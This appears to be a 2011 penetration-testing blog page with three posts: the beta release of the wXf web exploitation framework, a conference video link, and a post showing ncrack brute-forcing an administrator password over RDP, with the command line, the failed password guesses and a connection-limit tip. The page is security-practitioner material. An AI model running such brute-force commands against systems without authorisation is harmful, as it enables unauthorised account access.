carnal0wnage [Shared Reader]

Thursday, February 10, 2011

wXf released, thoughts, comments

Today we've released the beta version (rough, rough version) of wXf by making the repository public. Over the last year we've worked on this code in an "on again - off again" fashion. Since we've started the project we've learned a lot. I know I've personally learned a ton about Ruby and Metaprogramming (check out Paola Perrotta's book if you get a chance). We've rewritten the code several times but we've reached the point where it is at least stable enough to release. Now others have the chance to improve on it.

We've gotten loads of feedback from the beta group (consisting of a few volunteers) which has helped us tremendously with some of the usability and documentation. Additionally, we've started to gauge what people do and do not want to see. We know that the AppSec community doesn't want another point and click tool and certainly doesn't need another scanner.

The biggest question posed to us over the last 11 months was "Why not merge with (insert framework here)". The answer is actually incredibly simple and is the basis for why we created the software. We'd like the community of testers/consultants/developers/etc to decide what they want to see most. 

To have the ability to adapt an entire framework to the user base and change it as needed is only feasible if we a) have total flexibility in modifying ANY portion of the code and b) aren't pigeonholed into just one area of focus (exploitation, scanning).

Whether it be source code review, exploitation, enumeration, fuzzing modules, phishing, mobile appsec or whatever else.......... we'd like to glue together some of the ideas and scripts of the community at large. So please contribute. Submit bugs, provide feedback,  help with the wiki  or develop modules. Every little bit counts.

wXf GitHub Page

Thanks!

Ken

Wednesday, February 9, 2011

move over tsgrinder/tscrack hello ncrack!

So thanks to mubix for telling me that ncrack now supports RDP. very cool stuff.

user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator 192.168.1.100:3389,CL=10

Fetchfile found /usr/local/share/ncrack/default.pwd

Starting Ncrack 0.3ALPHA ( http://ncrack.org ) at 2011-02-09 15:28 PST

rdp://192.168.1.100:3389 (EID 1) Login failed: 'administrator' '123456'
rdp://192.168.1.100:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
...
rdp://192.168.1.100:3389 (EID 1518) Login failed: 'administrator' 'pitbull'
rdp://192.168.1.100:3389 (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp://192.168.1.100:3389 (EID 1520) Login failed: 'administrator' 'geraldine'
rdp://192.168.1.100:3389 (EID 1520) Attempts: total 1520 completed 1514 supported 1 --- rate 3.17
rdp://192.168.1.100:3389 (EID 1522) Login failed: 'administrator' 'allstar'
rdp://192.168.1.100:3389 last: 0.00 current 0.00 parallelism 10
rdp://192.168.1.100:3389 Increasing connection limit to: 10
rdp://192.168.1.100:3389 (EID 1522) Attempts: total 1521 completed 1515 supported 1 --- rate 3.00
...


Keep in mind that against XP you can only have one connection at a time so you'll have to set your Connection Limit value to 1 (CL=1)

Thursday, February 3, 2011

wXf presentation video

As an update, wXf is almost ready to move forward with it's first release. Hopefully the software is what folks expected as we are still learning from and adapting to the beta group's feedback.

In the meantime, if you couldn't attend AppSec DC 2010, here is the video of  the presentation Chris Gates, Seth Law and I put together. Unfortunately Seth Law could not make it due to a prior engagement but nevertheless contributed to the content.

Make sure to check out all of the great presentations that AppSec DC had under the asdc10 group on vimeo. Doug Wilson and Mark Bristow did a fantastic job organizing this conference and my hat goes off to them.


wxf: Web Exploitation Framework with Ken Johnson, Fishnet Security and Chris Gates, No Affiliation. from OWASP DC on Vimeo.